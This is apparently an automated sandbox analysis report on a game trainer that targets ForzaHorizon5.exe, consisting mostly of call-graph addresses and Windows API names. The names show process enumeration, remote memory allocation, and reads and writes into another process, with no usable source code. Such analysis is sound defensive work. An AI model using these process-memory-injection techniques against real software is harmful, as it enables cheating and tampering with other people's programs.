7ffb22653f70 45 API calls 3852->3851 3859 7ffb226538db 3853->3859 3860 7ffb22653f70 45 API calls 3853->3860 3854->3853 3855->3836 3856 7ffb22653b2d 3855->3856 3857 7ffb22653b26 _invalid_parameter_noinfo_noreturn 3855->3857 3858 7ffb22654918 free 3856->3858 3857->3856 3858->3836 3864 7ffb22653928 3859->3864 3976 7ffb22654150 3859->3976 3860->3859 3862 7ffb22653f70 45 API calls 3862->3864 3863 7ffb2265396a 3865 7ffb22654150 6 API calls 3863->3865 3866 7ffb2265399a 3863->3866 3864->3862 3864->3863 3865->3866 3867 7ffb22653f70 45 API calls 3866->3867 3868 7ffb226539dc 3866->3868 3867->3866 3869 7ffb22654150 6 API calls 3868->3869 3871 7ffb226539fd 3868->3871 3869->3871 3870 7ffb22653f70 45 API calls 3870->3871 3871->3870 3872 7ffb22653a46 3871->3872 3873 7ffb22653b5b _CxxThrowException 3872->3873 3874 7ffb22653a57 WriteProcessMemory WriteProcessMemory 3872->3874 3874->3855 3875 7ffb22653abd 3874->3875 3875->3844 3875->3848 3878 7ffb226531dc 3877->3878 3879 7ffb226536aa 3877->3879 3881 7ffb22654150 6 API calls 3878->3881 3880 7ffb22654570 8 API calls 3879->3880 3882 7ffb226536b6 3880->3882 3885 7ffb22653207 3881->3885 3882->3845 3883 7ffb22653f70 34 API calls 3883->3885 3884 7ffb22653249 3886 7ffb22654150 6 API calls 3884->3886 3888 7ffb22653275 3884->3888 3885->3883 3885->3884 3886->3888 3887 7ffb22653f70 34 API calls 3887->3888 3888->3887 3890 7ffb226532b7 3888->3890 3889 7ffb22654150 6 API calls 3889->3890 3890->3889 3891 7ffb22653f70 34 API calls 3890->3891 3892 7ffb226533b2 3890->3892 3891->3890 3893 7ffb22654150 6 API calls 3892->3893 3895 7ffb226533de 3892->3895 3893->3895 3894 7ffb22653f70 34 API calls 3894->3895 3895->3894 3897 7ffb22653426 3895->3897 3896 7ffb22654150 6 API calls 3896->3897 3897->3896 3898 7ffb22653f70 34 API calls 3897->3898 3899 7ffb22653522 3897->3899 3898->3897 3900 7ffb22654150 6 API calls 3899->3900 3902 7ffb22653548 3899->3902 3900->3902 3901 7ffb22653f70 34 API calls 3901->3902 3902->3901 3903 7ffb2265358a 3902->3903 3904 7ffb22653596 3903->3904 3905 7ffb22653f70 34 API calls 3903->3905 3906 7ffb226535ce 3904->3906 3907 7ffb226536d4 3904->3907 3905->3904 3909 7ffb22654920 4 API calls 3906->3909 3988 7ffb22653f50 ?_Xout_of_range@std@@YAXPEBD 3907->3988 3911 7ffb226535d8 VirtualAllocEx WriteProcessMemory 3909->3911 3912 7ffb2265366e 3911->3912 3913 7ffb2265364a VirtualFreeEx 3911->3913 3912->3879 3916 7ffb2265369f 3912->3916 3920 7ffb22653698 _invalid_parameter_noinfo_noreturn 3912->3920 3915 7ffb22654918 free 3913->3915 3914 7ffb22653b32 3917 7ffb22654570 8 API calls 3914->3917 3915->3912 3921 7ffb22654918 free 3916->3921 3922 7ffb22653b3e 3917->3922 3918 7ffb22653727 ReadProcessMemory memcmp 3918->3914 3919 7ffb22653778 3918->3919 3923 7ffb226531a0 34 API calls 3919->3923 3920->3916 3921->3879 3922->3845 3926 7ffb2265377d 3923->3926 3924 7ffb2265381c 3928 7ffb22653f70 34 API calls 3924->3928 3925 7ffb22653ae1 _invalid_parameter_noinfo_noreturn 3929 7ffb22653ae8 3925->3929 3926->3924 3926->3925 3927 7ffb22654918 free 3926->3927 3927->3924 3930 7ffb22653867 3928->3930 3931 7ffb22654918 free 3929->3931 3932 7ffb2265387b 3930->3932 3933 7ffb22653f70 34 API calls 3930->3933 3936 7ffb22653af3 3931->3936 3934 7ffb226538ab 3932->3934 3935 7ffb22653f70 34 API calls 3932->3935 3933->3932 3940 7ffb226538db 3934->3940 3941 7ffb22653f70 34 API calls 3934->3941 3935->3934 3936->3914 3937 7ffb22653b2d 3936->3937 3938 7ffb22653b26 _invalid_parameter_noinfo_noreturn 3936->3938 3939 7ffb22654918 free 3937->3939 3938->3937 3939->3914 3942 7ffb22654150 6 API calls 3940->3942 3945 7ffb22653928 3940->3945 3941->3940 3942->3945 3943 7ffb22653f70 34 API calls 3943->3945 3944 7ffb2265396a 3946 7ffb22654150 6 API calls 3944->3946 3948 7ffb2265399a 3944->3948 3945->3943 3945->3944 3946->3948 3947 7ffb22653f70 34 API calls 3947->3948 3948->3947 3949 7ffb226539dc 3948->3949 3950 7ffb22654150 6 API calls 3949->3950 3952 7ffb226539fd 3949->3952 3950->3952 3951 7ffb22653f70 34 API calls 3951->3952 3952->3951 3953 7ffb22653a46 3952->3953 3954 7ffb22653b5b _CxxThrowException 3953->3954 3955 7ffb22653a57 WriteProcessMemory WriteProcessMemory 3953->3955 3955->3936 3956 7ffb22653abd 3955->3956 3956->3925 3956->3929 3958 7ffb22653faf 3957->3958 3959 7ffb226540a7 3957->3959 3961 7ffb22654024 3958->3961 3962 7ffb226540ac 3958->3962 3963 7ffb22653fd5 3958->3963 3960 7ffb22653180 42 API calls 3959->3960 3960->3962 3964 7ffb22653fe9 3961->3964 3966 7ffb22654920 4 API calls 3961->3966 3967 7ffb22651400 Concurrency::cancel_current_task __std_exception_copy 3962->3967 3965 7ffb22654920 4 API calls 3963->3965 3969 7ffb22654052 3964->3969 3970 7ffb22654057 memcpy 3964->3970 3968 7ffb22653fe4 3965->3968 3966->3964 3971 7ffb226540b2 3967->3971 3968->3964 3972 7ffb2265401d _invalid_parameter_noinfo_noreturn 3968->3972 3973 7ffb22654070 memcpy 3969->3973 3970->3973 3972->3961 3974 7ffb226540c0 2 API calls 3973->3974 3975 7ffb22653867 3974->3975 3975->3851 3975->3852 3977 7ffb226541a2 3976->3977 3978 7ffb2265417a 3976->3978 3979 7ffb2265418d memcpy 3977->3979 3981 7ffb22654920 4 API calls 3977->3981 3980 7ffb226541ed 3978->3980 3984 7ffb22654920 4 API calls 3978->3984 3979->3980 3983 7ffb22651400 Concurrency::cancel_current_task __std_exception_copy 3980->3983 3981->3979 3985 7ffb226541f2 3983->3985 3986 7ffb22654188 3984->3986 3986->3979 3987 7ffb2265419b _invalid_parameter_noinfo_noreturn 3986->3987 3987->3977 3989 7ffb22653f70 3988->3989 3990 7ffb22653faf 3989->3990 3991 7ffb226540a7 3989->3991 3993 7ffb22653fd5 3990->3993 3994 7ffb22654024 3990->3994 3995 7ffb226540ac 3990->3995 4014 7ffb22653180 ?_Xlength_error@std@@YAXPEBD 3991->4014 3997 7ffb22654920 4 API calls 3993->3997 3996 7ffb22653fe9 3994->3996 3998 7ffb22654920 4 API calls 3994->3998 3999 7ffb22651400 Concurrency::cancel_current_task __std_exception_copy 3995->3999 4001 7ffb22654052 3996->4001 4002 7ffb22654057 memcpy 3996->4002 4000 7ffb22653fe4 3997->4000 3998->3996 4003 7ffb226540b2 3999->4003 4000->3996 4004 7ffb2265401d _invalid_parameter_noinfo_noreturn 4000->4004 4005 7ffb22654070 memcpy 4001->4005 4002->4005 4004->3994 4008 7ffb226540c0 4005->4008 4009 7ffb226540e8 4008->4009 4010 7ffb226536d9 4008->4010 4011 7ffb2265410d 4009->4011 4012 7ffb2265413d _invalid_parameter_noinfo_noreturn 4009->4012 4010->3914 4010->3918 4010->3919 4013 7ffb22654918 free 4011->4013 4013->4010 4015 7ffb226531a0 4014->4015 4016 7ffb226536aa 4015->4016 4018 7ffb22654150 6 API calls 4015->4018 4017 7ffb22654570 8 API calls 4016->4017 4019 7ffb226536b6 4017->4019 4022 7ffb22653207 4018->4022 4019->3995 4020 7ffb22653f70 33 API calls 4020->4022 4021 7ffb22653249 4023 7ffb22654150 6 API calls 4021->4023 4025 7ffb22653275 4021->4025 4022->4020 4022->4021 4023->4025 4024 7ffb22653f70 33 API calls 4024->4025 4025->4024 4027 7ffb226532b7 4025->4027 4026 7ffb22654150 6 API calls 4026->4027 4027->4026 4028 7ffb22653f70 33 API calls 4027->4028 4029 7ffb226533b2 4027->4029 4028->4027 4030 7ffb22654150 6 API calls 4029->4030 4032 7ffb226533de 4029->4032 4030->4032 4031 7ffb22653f70 33 API calls 4031->4032 4032->4031 4035 7ffb22653426 4032->4035 4033 7ffb22653f70 33 API calls 4033->4035 4034 7ffb22654150 6 API calls 4034->4035 4035->4033 4035->4034 4036 7ffb22653522 4035->4036 4037 7ffb22654150 6 API calls 4036->4037 4039 7ffb22653548 4036->4039 4037->4039 4038 7ffb22653f70 33 API calls 4038->4039 4039->4038 4040 7ffb2265358a 4039->4040 4041 7ffb22653596 4040->4041 4042 7ffb22653f70 33 API calls 4040->4042 4043 7ffb226535ce 4041->4043 4044 7ffb226536d4 4041->4044 4042->4041 4046 7ffb22654920 4 API calls 4043->4046 4045 7ffb22653f50 33 API calls 4044->4045 4047 7ffb226536d9 4045->4047 4048 7ffb226535d8 VirtualAllocEx WriteProcessMemory 4046->4048 4051 7ffb22653b32 4047->4051 4055 7ffb22653727 ReadProcessMemory memcmp 4047->4055 4056 7ffb22653778 4047->4056 4049 7ffb2265366e 4048->4049 4050 7ffb2265364a VirtualFreeEx 4048->4050 4049->4016 4053 7ffb2265369f 4049->4053 4057 7ffb22653698 _invalid_parameter_noinfo_noreturn 4049->4057 4052 7ffb22654918 free 4050->4052 4054 7ffb22654570 8 API calls 4051->4054 4052->4049 4058 7ffb22654918 free 4053->4058 4059 7ffb22653b3e 4054->4059 4055->4051 4055->4056 4060 7ffb226531a0 33 API calls 4056->4060 4057->4053 4058->4016 4059->3995 4063 7ffb2265377d 4060->4063 4061 7ffb2265381c 4065 7ffb22653f70 33 API calls 4061->4065 4062 7ffb22653ae1 _invalid_parameter_noinfo_noreturn 4066 7ffb22653ae8 4062->4066 4063->4061 4063->4062 4064 7ffb22654918 free 4063->4064 4064->4061 4067 7ffb22653867 4065->4067 4068 7ffb22654918 free 4066->4068 4069 7ffb2265387b 4067->4069 4070 7ffb22653f70 33 API calls 4067->4070 4073 7ffb22653af3 4068->4073 4071 7ffb226538ab 4069->4071 4072 7ffb22653f70 33 API calls 4069->4072 4070->4069 4077 7ffb226538db 4071->4077 4078 7ffb22653f70 33 API calls 4071->4078 4072->4071 4073->4051 4074 7ffb22653b2d 4073->4074 4075 7ffb22653b26 _invalid_parameter_noinfo_noreturn 4073->4075 4076 7ffb22654918 free 4074->4076 4075->4074 4076->4051 4079 7ffb22654150 6 API calls 4077->4079 4082 7ffb22653928 4077->4082 4078->4077 4079->4082 4080 7ffb22653f70 33 API calls 4080->4082 4081 7ffb2265396a 4083 7ffb22654150 6 API calls 4081->4083 4085 7ffb2265399a 4081->4085 4082->4080 4082->4081 4083->4085 4084 7ffb22653f70 33 API calls 4084->4085 4085->4084 4086 7ffb226539dc 4085->4086 4087 7ffb22654150 6 API calls 4086->4087 4089 7ffb226539fd 4086->4089 4087->4089 4088 7ffb22653f70 33 API calls 4088->4089 4089->4088 4090 7ffb22653a46 4089->4090 4091 7ffb22653b5b _CxxThrowException 4090->4091 4092 7ffb22653a57 WriteProcessMemory WriteProcessMemory 4090->4092 4092->4073 4093 7ffb22653abd 4092->4093 4093->4062 4093->4066 4095 7ffb22654e0a RtlLookupFunctionEntry 4094->4095 4096 7ffb22654e20 RtlVirtualUnwind 4095->4096 4097 7ffb22654d47 4095->4097 4096->4095 4096->4097 4098 7ffb22654ce8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 4097->4098 4131 7ffb22655608 __scrt_dllmain_exception_filter 4132 7ffb226525f0 4133 7ffb22654920 4 API calls 4132->4133 4138 7ffb22652644 CreateThread 4133->4138 4135 7ffb226526d1 4141 7ffb22653da0 4135->4141 4137 7ffb226526d6 4139 7ffb22654570 8 API calls 4137->4139 4138->4135 4138->4137 4140 7ffb2265270a 4139->4140 4142 7ffb22653dc1 4141->4142 4143 7ffb22653db3 CloseHandle 4141->4143 4142->4137 4143->4142 4165 7ffb226544b0 4166 7ffb226544be 4165->4166 4167 7ffb226544c8 4165->4167 4168 7ffb22654918 free 4166->4168 4168->4167 4169 7ffb226513b0 __std_exception_destroy 4230 7ffb22652e70 4231 7ffb22652eb4 4230->4231 4232 7ffb22652e81 4230->4232 4233 7ffb22652eac 4232->4233 4234 7ffb22652ec7 _invalid_parameter_noinfo_noreturn 4232->4234 4235 7ffb22654918 free 4233->4235 4235->4231 4261 7ffb22651030 4262 7ffb22654920 4 API calls 4261->4262 4263 7ffb2265103e 4262->4263 4264 7ffb22652230 CreateToolhelp32Snapshot 4265 7ffb226523fb strcpy_s 4264->4265 4266 7ffb22652285 Process32First 4264->4266 4267 7ffb22652550 2 API calls 4265->4267 4268 7ffb2265229b 4266->4268 4269 7ffb22652415 4267->4269 4268->4265 4270 7ffb226522b9 4268->4270 4271 7ffb226522a9 Process32Next 4268->4271 4273 7ffb22652469 free 4269->4273 4274 7ffb226523f6 4269->4274 4272 7ffb22654920 4 API calls 4270->4272 4271->4268 4275 7ffb226522c3 4272->4275 4273->4274 4276 7ffb22654570 8 API calls 4274->4276 4278 7ffb22651720 67 API calls 4275->4278 4277 7ffb22652486 4276->4277 4283 7ffb226522fa 4278->4283 4279 7ffb22652372 4279->4265 4280 7ffb2265237b GetForegroundWindow GetWindowThreadProcessId 4279->4280 4285 7ffb226523a0 4280->4285 4281 7ffb22652355 4284 7ffb22654918 free 4281->4284 4282 7ffb2265234d 4288 7ffb22654918 free 4282->4288 4283->4279 4283->4281 4283->4282 4287 7ffb226523b9 _invalid_parameter_noinfo_noreturn 4283->4287 4284->4279 4286 7ffb226523e3 4285->4286 4289 7ffb226523d7 strcpy_s 4285->4289 4286->4274 4290 7ffb226536e0 52 API calls 4286->4290 4287->4285 4288->4281 4289->4286 4290->4274 4144 7ffb226544e0 4145 7ffb226544f2 ?_Xbad_function_call@std@ 4144->4145 4147 7ffb226544f9 4144->4147 4145->4147 4146 7ffb22654918 free 4148 7ffb22654529 4146->4148 4147->4146 4149 7ffb226515e0 4151 7ffb2265167c 4149->4151 4152 7ffb226515fd 4149->4152 4150 7ffb226516e6 4154 7ffb2265170d _invalid_parameter_noinfo_noreturn 4150->4154 4153 7ffb22654918 free 4151->4153 4155 7ffb226516af 4151->4155 4152->4151 4152->4154 4157 7ffb22654918 free 4152->4157 4153->4151 4155->4150 4155->4154 4156 7ffb22654918 free 4155->4156 4156->4150 4157->4152 4170 7ffb226512a0 4171 7ffb226512df 4170->4171 4172 7ffb226512b3 4170->4172 4173 7ffb226512d7 4172->4173 4174 7ffb226512f8 _invalid_parameter_noinfo_noreturn __std_exception_copy 4172->4174 4175 7ffb22654918 free 4173->4175 4175->4171 4176 7ffb226524a0 4177 7ffb226524b0 WriteProcessMemory 4176->4177 4178 7ffb226524f9 4176->4178 4177->4178 4179 7ffb226524e8 free 4177->4179 4184 7ffb226510c0 4178->4184 4179->4178 4182 7ffb22652511 WriteProcessMemory 4183 7ffb2265253c 4182->4183 4185 7ffb226510df 7 API calls 4184->4185 4186 7ffb22651297 4184->4186 4187 7ffb22651230 WriteProcessMemory 4185->4187 4188 7ffb22651261 WriteProcessMemory 4185->4188 4186->4182 4186->4183 4187->4188 4188->4186 4236 7ffb22651360 __std_exception_destroy 4237 7ffb22651388 4236->4237 4238 7ffb22651395 4236->4238 4239 7ffb22654918 free 4237->4239 4239->4238 4240 7ffb22651460 __std_exception_copy 4295 7ffb22652720 4349 7ffb22653020 4295->4349 4299 7ffb22652809 4300 7ffb2265284e 4299->4300 4301 7ffb22652849 4299->4301 4302 7ffb22652842 _invalid_parameter_noinfo_noreturn 4299->4302 4305 7ffb22652919 4300->4305 4363 7ffb22652ff0 4300->4363 4303 7ffb22654918 free 4301->4303 4302->4301 4303->4300 4306 7ffb22653dd0 49 API calls 4305->4306 4307 7ffb22652952 4306->4307 4308 7ffb226529a0 4307->4308 4309 7ffb2265299b 4307->4309 4310 7ffb22652994 _invalid_parameter_noinfo_noreturn 4307->4310 4313 7ffb22652a5a 4308->4313 4366 7ffb22652fc0 4308->4366 4311 7ffb22654918 free 4309->4311 4310->4309 4311->4308 4314 7ffb22653dd0 49 API calls 4313->4314 4315 7ffb22652a92 4314->4315 4316 7ffb22652ae0 4315->4316 4318 7ffb22652adb 4315->4318 4319 7ffb22652ad4 _invalid_parameter_noinfo_noreturn 4315->4319 4369 7ffb22652f90 4316->4369 4320 7ffb22654918 free 4318->4320 4319->4318 4320->4316 4322 7ffb22653dd0 49 API calls 4323 7ffb22652b59 ReadProcessMemory 4322->4323 4324 7ffb22652be0 4323->4324 4325 7ffb22652ba5 4323->4325 4330 7ffb22652c4b 4324->4330 4372 7ffb22652f60 4324->4372 4326 7ffb22652bdb 4325->4326 4328 7ffb22652bd4 _invalid_parameter_noinfo_noreturn 4325->4328 4329 7ffb22654918 free 4326->4329 4328->4326 4329->4324 4331 7ffb22653dd0 49 API calls 4330->4331 4332 7ffb22652c82 4331->4332 4333 7ffb22652cc7 ReadProcessMemory 4332->4333 4335 7ffb22652cc2 4332->4335 4338 7ffb22652cbb _invalid_parameter_noinfo_noreturn 4332->4338 4334 7ffb22652d71 4333->4334 4339 7ffb22652d76 4333->4339 4375 7ffb22652f30 4334->4375 4336 7ffb22654918 free 4335->4336 4336->4333 4338->4335 4340 7ffb22653dd0 49 API calls 4339->4340 4341 7ffb22652db2 ReadProcessMemory 4340->4341 4342 7ffb22652dfe 4341->4342 4343 7ffb22652e38 4341->4343 4344 7ffb22652e33 4342->4344 4346 7ffb22652e2c _invalid_parameter_noinfo_noreturn 4342->4346 4345 7ffb22654570 8 API calls 4343->4345 4347 7ffb22654918 free 4344->4347 4348 7ffb22652e4b 4345->4348 4346->4344 4347->4343 4378 7ffb22653050 4349->4378 4351 7ffb226527d9 4352 7ffb22653dd0 4351->4352 4356 7ffb22653e1f 4352->4356 4361 7ffb22653edd 4352->4361 4353 7ffb22653ef2 4353->4299 4354 7ffb22653ee9 free 4354->4353 4355 7ffb22653e5f ReadProcessMemory 4355->4356 4356->4355 4357 7ffb22653f1e 4356->4357 4358 7ffb22653e4c malloc 4356->4358 4359 7ffb22653e43 free 4356->4359 4356->4361 4360 7ffb22653f50 45 API calls 4357->4360 4358->4355 4359->4358 4362 7ffb22653f23 4360->4362 4361->4353 4361->4354 4362->4299 4364 7ffb22653050 46 API calls 4363->4364 4365 7ffb22653016 4364->4365 4365->4305 4367 7ffb22653050 46 API calls 4366->4367 4368 7ffb22652fe6 4367->4368 4368->4313 4370 7ffb22653050 46 API calls 4369->4370 4371 7ffb22652b29 4370->4371 4371->4322 4373 7ffb22653050 46 API calls 4372->4373 4374 7ffb22652f86 4373->4374 4374->4330 4376 7ffb22653050 46 API calls 4375->4376 4377 7ffb22652f56 4376->4377 4377->4339 4379 7ffb22653078 4378->4379 4388 7ffb226530b0 4378->4388 4380 7ffb226530c5 4379->4380 4382 7ffb2265311d 4379->4382 4383 7ffb226530a6 4379->4383 4389 7ffb22653122 4379->4389 4387 7ffb22654920 4 API calls 4380->4387 4380->4388 4381 7ffb22653180 45 API calls 4386 7ffb22653128 4381->4386 4384 7ffb22651400 Concurrency::cancel_current_task __std_exception_copy 4382->4384 4385 7ffb22654920 4 API calls 4383->4385 4384->4389 4390 7ffb226530ab 4385->4390 4386->4351 4387->4388 4388->4351 4389->4381 4390->4388 4391 7ffb226530be _invalid_parameter_noinfo_noreturn 4390->4391 4391->4380 4189 7ffb22654ca8 4190 7ffb22654cc9 4189->4190 4191 7ffb22654cc4 4189->4191 4193 7ffb226551b0 4191->4193 4194 7ffb22655247 4193->4194 4195 7ffb226551d3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 4193->4195 4194->4190 4195->4194 4392 7ffb22655428 4393 7ffb22655460 __GSHandlerCheckCommon 4392->4393 4394 7ffb2265547b __CxxFrameHandler4 4393->4394 4395 7ffb2265548c 4393->4395 4394->4395

                                                                                      Executed Functions

                                                                                      Function 00007FFAAC661A48 Relevance: 13.2, Strings: 9, Instructions: 1958COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 7ffaac661a48-7ffaac662d3f call 7ffaac660dd8 call 7ffaac660de8 * 3 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660de8 * 8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660df8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 call 7ffaac660d38 call 7ffaac660db8 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660dc8 call 7ffaac660d38 call 7ffaac660db8 call 7ffaac660e18 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660dc8 call 7ffaac660d38 call 7ffaac660db8 call 7ffaac660e18 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660dc8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 call 7ffaac660de8 * 3 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660df8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660e28 call 7ffaac660e38 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660e48 call 7ffaac660de8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660df8 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e58 call 7ffaac660e68 call 7ffaac660e58 call 7ffaac660e68 call 7ffaac660e58 call 7ffaac660e68 call 7ffaac660e58 call 7ffaac660d38 call 7ffaac660d48 call 7ffaac660d58 call 7ffaac660d78 call 7ffaac660d98 call 7ffaac660e08 292 7ffaac662d51-7ffaac662d56 0->292 293 7ffaac662d41-7ffaac662d48 0->293 296 7ffaac662d69-7ffaac662dd3 call 7ffaac660e88 call 7ffaac660e98 call 7ffaac660de8 * 2 292->296 297 7ffaac662d58 292->297 294 7ffaac662d5a 293->294 295 7ffaac662d4a-7ffaac662d50 293->295 298 7ffaac662d5c-7ffaac662d67 call 7ffaac660e78 294->298 299 7ffaac662dd6-7ffaac662df9 294->299 295->292 296->299 297->294 298->296 306 7ffaac662dfb-7ffaac662e0e 299->306 307 7ffaac662e15-7ffaac662e7f call 7ffaac660ea8 call 7ffaac660d48 299->307 306->307 324 7ffaac662e81-7ffaac662e98 307->324 325 7ffaac662e99-7ffaac662ef7 307->325 324->325 333 7ffaac662f11-7ffaac662f42 325->333 334 7ffaac662ef9-7ffaac662f0f 325->334 339 7ffaac662f43-7ffaac662f4c 333->339 334->333 341 7ffaac662f4e-7ffaac662f6f 339->341 344 7ffaac662f71-7ffaac662f87 341->344 345 7ffaac662f89-7ffaac663019 call 7ffaac660eb8 call 7ffaac660ec8 call 7ffaac660eb8 * 2 call 7ffaac660ec8 341->345 344->345 360 7ffaac66301e-7ffaac6630c3 call 7ffaac660eb8 call 7ffaac660ec8 call 7ffaac660eb8 call 7ffaac660ec8 call 7ffaac660eb8 call 7ffaac660ec8 345->360
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$b4$b4$b4$b4$b4$b4$b4$b4
                                                                                      • API String ID: 0-28069211
                                                                                      • Opcode ID: de1887fda7ae48c782369446a62109fc8137de8ac608e5ce8fe2f0575f491669
                                                                                      • Instruction ID: bab6c2c88c6877cf45120d8eb3bce4833f3565a952428948c966f0dfd529410d
                                                                                      • Opcode Fuzzy Hash: de1887fda7ae48c782369446a62109fc8137de8ac608e5ce8fe2f0575f491669
                                                                                      • Instruction Fuzzy Hash: E8F27B70619B45CFE399EF28C044AAAB7E1FF99304F50957DE04EC72A2CA35E845CB85
                                                                                      Function 00007FFB22652010 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137processstringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CreateFirstNextSnapshotToolhelp32strcmp
                                                                                      • String ID: ForzaHorizon5.exe
                                                                                      • API String ID: 2015246625-4184888841
                                                                                      • Opcode ID: 7359882a146a30dbad1e41fb6eb8441f01d5a7ba2dc1f03e1a21fda49bb60f06
                                                                                      • Instruction ID: a326431277584aea0f05c4e7280ae13e0519b8ba7b63d8a3a898684e16e0e635
                                                                                      • Opcode Fuzzy Hash: 7359882a146a30dbad1e41fb6eb8441f01d5a7ba2dc1f03e1a21fda49bb60f06
                                                                                      • Instruction Fuzzy Hash: DE512CB7A29BC182FA528B35EC5026A73A4FB88B90F488131DA5E87764DFBCD455C740
                                                                                      Function 00007FFAAC66152C Relevance: 2.9, Strings: 2, Instructions: 414COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: b4$b4
                                                                                      • API String ID: 0-1499902546
                                                                                      • Opcode ID: 8700a8d17c066fcd57a2ce18d15cce4d528b2c54d0ce1684f8865780b8cd274f
                                                                                      • Instruction ID: b7bd7792d99ab0e27eb12cf7e4ec6eed97aef846a6790d669425b77b29c77d62
                                                                                      • Opcode Fuzzy Hash: 8700a8d17c066fcd57a2ce18d15cce4d528b2c54d0ce1684f8865780b8cd274f
                                                                                      • Instruction Fuzzy Hash: DDF13870619A45CFE399EF28C055B9AB7E1FF89300F50957EE08EC7292CA35E841CB45
                                                                                      Function 00007FFAAC6610ED Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: j&$@n&
                                                                                      • API String ID: 0-4189027139
                                                                                      • Opcode ID: b66ca4ea2434c409b124a0883e1d041767e8cd581b667df6d9da697194737fea
                                                                                      • Instruction ID: c758f1fe195fe914ecb0a046e75ed2e3249c4d8ad21a5681ea55317855cdd2e1
                                                                                      • Opcode Fuzzy Hash: b66ca4ea2434c409b124a0883e1d041767e8cd581b667df6d9da697194737fea
                                                                                      • Instruction Fuzzy Hash: 00310997E1EA865BF79EE77888565B5EBD1FF62340B08A176D08EC3193DC19E80942C0
                                                                                      Function 00007FFAAC660770 Relevance: .1, Instructions: 142COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1778f03b9567371556c83c611935d169559b6e47d46ef26cedd7f0ba253daa1b
                                                                                      • Instruction ID: 88eb1c8df260ba7b55aea5091cd4ec53e3e6a323a51868abe1f04eaeed7d7619
                                                                                      • Opcode Fuzzy Hash: 1778f03b9567371556c83c611935d169559b6e47d46ef26cedd7f0ba253daa1b
                                                                                      • Instruction Fuzzy Hash: B941D652D4FA869FF75AD77858661A9BF90EF22210B08A1BBD04C8B1D3ED18A80D42C5
                                                                                      Function 00007FFAAC66132F Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
